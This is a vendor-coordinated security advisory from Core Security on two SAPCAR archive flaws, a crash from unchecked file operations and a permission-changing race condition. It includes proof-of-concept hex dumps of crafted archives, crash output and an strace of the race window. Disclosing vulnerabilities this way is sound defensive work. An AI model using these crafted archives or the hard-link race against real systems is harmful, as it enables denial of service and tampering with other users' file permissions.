CVSS2
Attack Vector
LOCAL
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
EPSS
Percentile
70.7%
**Title:**SAP CAR Multiple Vulnerabilities
**Advisory ID:**CORE-2016-0006
Advisory URL:<https://www.coresecurity.com/core-labs/advisories/sap-car-multiple-vulnerabilities>
**Date published:**2016-08-10
**Date of last update:**2016-08-10
**Vendors contacted:**SAP
**Release mode:**Coordinated release
**Class:**Unchecked Return Value [CWE-252], TOCTOU Race Condition [CWE-367]
**Impact:**Denial of service, Security bypass
**Remotely Exploitable:**No
**Locally Exploitable:**Yes
CVE Name:CVE-2016-5845, CVE-2016-5847
SAP [1] distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to local denial of service conditions or privilege escalation.
Other products and versions might be affected, but they were not tested.
SAP published the following Security Notes:
This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
SAP distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to denial of service conditions or escalation of privileges.
The code that handles the extraction of archive files is prone to privilege escalation and denial of service vulnerabilities.
[CVE-2016-5845] Denial of service vulnerability due the SAPCAR program not checking the return value of file operations when extracting files. This might result in the program crashing when trying to extract files from an specially crafted archive file that contains invalid file names for the target platform. Of special interest are applications or solutions that makes use of SAPCAR in an automated way.
The following is a proof of concept to demonstrate the vulnerability:
$ xxd SAPCAR_crash.SAR 0000000: 4341 5220 322e 3031 4452 0081 0000 0f00 CAR 2.01DR...... 0000010: 0000 0000 0000 0000 0000 d4f8 e555 0000 .............U.. 0000020: 0000 0000 0000 0000 1000 696e 7075 742d ..........input- 0000030: 6469 722f 696e 7090 7400 4544 1a00 0000 dir/inp.t.ED.... 0000040: 0f00 0000 121f 9d02 7bc1 23b9 a90a 25a9 ........{.#...%. 0000050: 1525 0a69 9939 a95c 0000 857f b95a .%.i.9.\.....Z $ ./SAPCAR -dvf SAPCAR_crash.SAR SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01) d input-dir/inp#t SAPCAR: checksum error in input-dir/inp#t (error 12). No such file or director $ ./SAPCAR -xvf SAPCAR_crash.SAR SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01) x input-dir/inp#t Segmentation fault
[CVE-2016-5847] Race condition vulnerability due to the way the SAPCAR program change the permissions of extracted files. If a malicious local user has access to a directory where a user is extracting files using SAPCAR, the attacker might use this vulnerability to change the permissions of arbitrary files belonging to the user.
The SAPCAR program writes the file being extracted and after closing it, the program changes the permissions to the ones set on the archive file. There’s a time gap between the creating of the file and the change of the permissions. During this time frame, a malicious local user can replace the extracted file with a hard link to a file belonging to another user, resulting in the SAPCAR program changing the permissions on the hard-linked file to be the same as that of the compressed file.
The following is a proof of concept to demonstrate the vulnerability:
$ xxd SAPCAR_race_condition.SAR 0000000: 4341 5220 322e 3031 5247 b481 0000 2b00 CAR 2.01RG....+. 0000010: 0000 0000 0000 0000 0000 d023 5e56 0000 ...........#^V.. 0000020: 0000 0000 0000 0000 1000 7465 7374 5f73 ..........test_s 0000030: 7472 696e 672e 7478 7400 4544 3500 0000 tring.txt.ED5... 0000040: 2b00 0000 121f 9d02 7b21 19a9 0a85 a599 +.......{!...... 0000050: c9d9 0a49 45f9 e579 0a69 f915 0a59 a5b9 ...IE..y.i...Y.. 0000060: 05c5 0af9 65a9 450a 2540 e99c c4aa 4a85 ....e.E.%@....J. 0000070: 94fc 7400 0008 08c6 b9 ..t...... $ ./SAPCAR -tvf SAPCAR_race_condition.SAR SAPCAR: processing archive SAPCAR_race_condition.SAR (version 2.01) -rw-rw-r-- 43 01 Dec 2015 19:48 test_string.txt $ strace ./SAPCAR -xvf SAPCAR_race_condition.SAR execve("./SAPCAR", ["./SAPCAR", "-xvf", "SAPCAR_race_condition.SAR"], [/* 76 vars */]) = 0 [..] open("test_string.txt", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4 mmap(NULL, 323584, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c4704000 fstat(4, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c475c000 write(4, "The quick brown fox jumps over t"..., 43) = 43 close(4) = 0 munmap(0x7f98c475c000, 4096) = 0 utime("test_string.txt", [2015/12/01-19:48:48, 2015/12/01-19:48:48]) = 0 chmod("test_string.txt", 0664) = 0 [..]
[1] <http://go.sap.com/>.
CoreLabs, the research center of Core Security, A Fortra Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2016 Core Security and © 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security advisories team.
CVSS2
Attack Vector
LOCAL
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
EPSS
Percentile
70.7%